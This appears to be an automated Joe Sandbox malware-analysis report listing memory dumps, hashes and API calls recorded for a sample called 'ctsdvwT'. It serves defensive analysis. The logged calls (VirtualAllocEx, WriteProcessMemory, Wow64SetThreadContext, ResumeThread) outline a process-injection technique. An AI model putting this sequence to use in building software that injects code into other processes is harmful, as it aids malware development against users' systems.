                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013D59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0

                                            Control-flow Graph

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A57748
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0

                                            Control-flow Graph

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A57748
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0

                                            Control-flow Graph

                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57828
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0

                                            Control-flow Graph

                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A57166
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013DD58E,?,?,?,?,?), ref: 013DD64F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57828
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0

                                            Control-flow Graph

                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A57166
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013DD58E,?,?,?,?,?), ref: 013DD64F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57666
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57666
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,013DB104), ref: 013DB33E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A83D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A83D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 85a8e014354435e5e0828a24bdd125b76e5a7fc1e4a6368c51d9aa0a6b30afc9
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: AF110372404280CFCB06CF54D5C4B16BF71FB88318F24C6A9D9490B25BC336D45ACBA2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 29365ea609eea1e50e71bf41739a1ece89c714e8f4cebdee2ca90ed57a1de9f0
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: 40112672444240CFDB16CF44D5C4B56BF71FB89324F24C6A9D9090B25BC73AE45ACBA2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 93138cc410b9417f55dd973bdd5a714c0088659d186a2f69778c1e3e09a0267f
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 0411BB75504380DFDB02DF54D5C4B15BFB1FB85228F24C6A9D8494B296C33AD40ACB62
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b4a9f02998a7d5ad817879698cade631b15fae2f5b45efb1ab162059faca617
                                            • Instruction ID: bc8b7ee5dc5954c80df4e90f904e4afc5b00fd6d3671239021be3c7c748431ed
                                            • Opcode Fuzzy Hash: 0b4a9f02998a7d5ad817879698cade631b15fae2f5b45efb1ab162059faca617
                                            • Instruction Fuzzy Hash: 490120310043849AE7145E9DCD8CB67FF9CDF47328F18C52AED090A28AD2799400CA71
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 397f8f87bc40ffc21d8d44380d4136f29261f64c240aacf3d450b39c8ebe84f1
                                            • Instruction ID: cd0bff70b97ebf6dcb45d4e5751ff61a81d2273f2ad74f1f00dd91df53c907b1
                                            • Opcode Fuzzy Hash: 397f8f87bc40ffc21d8d44380d4136f29261f64c240aacf3d450b39c8ebe84f1
                                            • Instruction Fuzzy Hash: B9F0F6710043849EE7148E1ACC88B63FFD8EF42334F18C45AED084B28AC2799840CBB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,btq
                                            • API String ID: 0-3970051468
                                            • Opcode ID: 35ba21d186f7756809ffb53d22a539558fde650fefe9ddee27d88f02b6bfb181
                                            • Instruction ID: 462100a3ac87e3ec41d7a751900b30937605a2cbec67abb7eb14e9ac27943324
                                            • Opcode Fuzzy Hash: 35ba21d186f7756809ffb53d22a539558fde650fefe9ddee27d88f02b6bfb181
                                            • Instruction Fuzzy Hash: A7331C31D1061A8EDB11EF68C88069DF7B5FF99300F15C79AD449AB225EB70AAC5CF81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bcb4d48dc811474a72d70f96c86a4fc94f19324aac03a889e626e0768de87e1
                                            • Instruction ID: b98586f35770f9aa9251130d514ea08f8d2c0cb83fb5417786440e9c1f16658e
                                            • Opcode Fuzzy Hash: 6bcb4d48dc811474a72d70f96c86a4fc94f19324aac03a889e626e0768de87e1
                                            • Instruction Fuzzy Hash: A253F631C10B1A8ACB51EF68C8905A9F7B5FF99300F51C79AE458B7125FB70AAD4CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be2c83a2656cf360762f976bf19cca517e2cb5295a134890a49dd562a5e25926
                                            • Instruction ID: 5abc38e022cee2dc95716fa9cd63f2135ff06128013fa4878621c74156c27c8f
                                            • Opcode Fuzzy Hash: be2c83a2656cf360762f976bf19cca517e2cb5295a134890a49dd562a5e25926
                                            • Instruction Fuzzy Hash: 36B15D72E00209CFDF10CFA9C98579DBBF6BF88314F148529D819E7298EB749985CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59f7b49ba49ac38e2b1f97e8bec612c290d04095453327b8ae8cab374d123efe
                                            • Instruction ID: ae3e27b29c363920121e59481b25099e7a30c865078a289837d576d5a01586ed
                                            • Opcode Fuzzy Hash: 59f7b49ba49ac38e2b1f97e8bec612c290d04095453327b8ae8cab374d123efe
                                            • Instruction Fuzzy Hash: B9917E71E00609DFDF10CFA9C98179DBBF6BF88314F148129E819E7258EB349985CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 3
                                            • API String ID: 0-1842515611
                                            • Opcode ID: d637afaae9cdb9498fa35bcdb4c82c009446a911100b3c2088d237cbc9de56aa
                                            • Instruction ID: 237f351d0e1cd66adadb5c147b20b2a00441be092d45e6828b9e3488a05416dc
                                            • Opcode Fuzzy Hash: d637afaae9cdb9498fa35bcdb4c82c009446a911100b3c2088d237cbc9de56aa
                                            • Instruction Fuzzy Hash: E841AE36A002098FCB10DF78D4586ADBBF5EF89324F208469D505EB355DB359E45CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 1a6420d2ed106c398285c8cbf12f8144bef4a7f57d51bb8dc5ccb6a92cfb639f
                                            • Instruction ID: c34474447cca3c45e8fd0228d574cf7dfaf2d1dc6522c0e690f09edd87127e20
                                            • Opcode Fuzzy Hash: 1a6420d2ed106c398285c8cbf12f8144bef4a7f57d51bb8dc5ccb6a92cfb639f
                                            • Instruction Fuzzy Hash: 90311D317002099FCB1A9B78D55462E7BFBAF89310F208468E806DB399DF38CD46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 1408c07a98c58aec61b9265861afb1bb63dcae1d7afd0335c4d660a433b0f557
                                            • Instruction ID: 5d9d345495e482b9306868829a2137e66f55d1eca416de7833d164c66978c686
                                            • Opcode Fuzzy Hash: 1408c07a98c58aec61b9265861afb1bb63dcae1d7afd0335c4d660a433b0f557
                                            • Instruction Fuzzy Hash: E4318131E102099BDB15CFA9C4817EEB7B6EF45300F60852DF806E7354DB74AA42CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 7f37eb7ea4c5391e5343b99c8a6f2534a2260c119f936fe4c88b097f9978dedf
                                            • Instruction ID: fb55b02f0dd2d936145e4de554a820151153d7ba753583c2898e51ada8ff4b3b
                                            • Opcode Fuzzy Hash: 7f37eb7ea4c5391e5343b99c8a6f2534a2260c119f936fe4c88b097f9978dedf
                                            • Instruction Fuzzy Hash: 0B317231E102099BDB15CFA9D4407EEB7B6FF85304F508529F906E7254DB749A82CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \
                                            • API String ID: 0-2967466578
                                            • Opcode ID: 055a840a091262253991997486f76e74218a7d74457ccc430b70518e5050cc72
                                            • Instruction ID: 36544595407b0f26c20c154792dad14a7947b10e7c9d93a478e91abdcfdbf5b3
                                            • Opcode Fuzzy Hash: 055a840a091262253991997486f76e74218a7d74457ccc430b70518e5050cc72
                                            • Instruction Fuzzy Hash: 9B41F1B5D0034C9FDB14DFA9C584ADEBFF5AF08314F248429E819AB254DB74994ACB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 3d24b00241ce7b1a97c19aa0aa764de5013cf2246cf379120ad33ca046c31fac
                                            • Instruction ID: d967fe7e4e1df7619fcd7ea8ca01500f954ac72f5d45b48dad1ced0e28e13f4b
                                            • Opcode Fuzzy Hash: 3d24b00241ce7b1a97c19aa0aa764de5013cf2246cf379120ad33ca046c31fac
                                            • Instruction Fuzzy Hash: DA21BB33A082454FC7061F7CC4602AA7FB6EF92700B1584EBE049CB356EE759D0AC792
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fb5cb063f92340e30c2688466a61b9ed2b132b7682c560bf24cc706513ef514
                                            • Instruction ID: 39e5a55c5eba5b69992bec2834c9c278faf2a0c6f759cc92608115bf1e615976
                                            • Opcode Fuzzy Hash: 7fb5cb063f92340e30c2688466a61b9ed2b132b7682c560bf24cc706513ef514
                                            • Instruction Fuzzy Hash: 43D19F35B001059FDB14DF68D594AADBBBAFF88314F248529E806DB359DB34ED82CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ddae12690bae3b365dd3d4fd0e6f0654d64ff779cd2dc602128d70a3a460b44
                                            • Instruction ID: 8ab3fdbd04021cc236babdeeeebd140e721c4763017e816f336562745a913c9e
                                            • Opcode Fuzzy Hash: 0ddae12690bae3b365dd3d4fd0e6f0654d64ff779cd2dc602128d70a3a460b44
                                            • Instruction Fuzzy Hash: 78B18F313001069BCB19AB2CE58462D7BABFB95314F90593DE006CB369DF79ED8AC791
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba8444e5b572c72eb2655e74251a796781863450e5638d7872f2e0b6215cb80d
                                            • Instruction ID: 5f5f0b052301987eee2b18ac352de151b289c2512f91b44134744f4924a4ac75
                                            • Opcode Fuzzy Hash: ba8444e5b572c72eb2655e74251a796781863450e5638d7872f2e0b6215cb80d
                                            • Instruction Fuzzy Hash: 71A15C72E00209CFDF10CFA8C98579DBBF5BF88314F148529D819E7258EB749985CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c654319aebe6fd07fb9b8921dd762ddb990866d012df51b6fdd64a3ce64c6dbe
                                            • Instruction ID: 73fbf84b5f2159eba54ec9ce247b4bf5a8d26f2e5711861b790cd30b97ba3024
                                            • Opcode Fuzzy Hash: c654319aebe6fd07fb9b8921dd762ddb990866d012df51b6fdd64a3ce64c6dbe
                                            • Instruction Fuzzy Hash: C0916B71E00609DFDF10CFA9C981B9DBBF6BF88314F148129E819E7258EB749985CB91
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5e7af2ebc8aaf484b81e246b05277599f590ef8349bb409cb830d478fba0438
                                            • Instruction ID: cddf4b7f7b15f1169ae28488aa464c3f6c18ab0bab73465eb99ffc8e0e84217c
                                            • Opcode Fuzzy Hash: d5e7af2ebc8aaf484b81e246b05277599f590ef8349bb409cb830d478fba0438
                                            • Instruction Fuzzy Hash: 51718D71E002058FDB04CF69D994B99BBB6FF88314F14C169E909EB399DB70D944CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e2e52752be8a4dde66a33e481a075983a36bc8fc13cecb93ee823f20778522d
                                            • Instruction ID: ad3ef4874fd7e48a013fceb533ad275fedf86fed1281dec8825176a6e77cf786
                                            • Opcode Fuzzy Hash: 6e2e52752be8a4dde66a33e481a075983a36bc8fc13cecb93ee823f20778522d
                                            • Instruction Fuzzy Hash: 1D61C233E1052A8BDB15CB5DC8807BEF7F6EB84310F198969C856EB646C334AE41CB91
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7586c33d4a222c1b404f729181342c7f40c098269478b2f5da9e8e78125ce56
                                            • Instruction ID: 63d13d42efaba7ac3e52faf4cd1b850183dad82ae395327a8b787a046fff11ef
                                            • Opcode Fuzzy Hash: f7586c33d4a222c1b404f729181342c7f40c098269478b2f5da9e8e78125ce56
                                            • Instruction Fuzzy Hash: AA41BC32F001068BDF258AADD4A07AFB7BAFB45718F204826D519D7385D634DD46C792
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0ea97b1f819c34164d90b9a525849b25a37f86edb91375e86987ad2e8ae891c
                                            • Instruction ID: b1d71c85b2a45b9a869bd06d008c87f7dafff5f65ab137252a57d091282fc91f
                                            • Opcode Fuzzy Hash: b0ea97b1f819c34164d90b9a525849b25a37f86edb91375e86987ad2e8ae891c
                                            • Instruction Fuzzy Hash: E95124B1D002188FDB14CFA9C885B9DBBB5FF48314F248129E819BB395E7B4A944CF95
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13ee409add65db3d45dacf0e5eac7bd62e475bbd177bc647781156a9597e7ee8
                                            • Instruction ID: 9eb13382c9d5a272b7f45940874c5cc98105dfd222b749f0829ee64e615369e8
                                            • Opcode Fuzzy Hash: 13ee409add65db3d45dacf0e5eac7bd62e475bbd177bc647781156a9597e7ee8
                                            • Instruction Fuzzy Hash: 105123B1D002188FDB14CFA9C884B9DBBB5BF48314F248129E819BB395D7B4A944CF95
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dce302749ce642feaf3dc73025790130191c72fb09cfb3671b87316d3f44e075
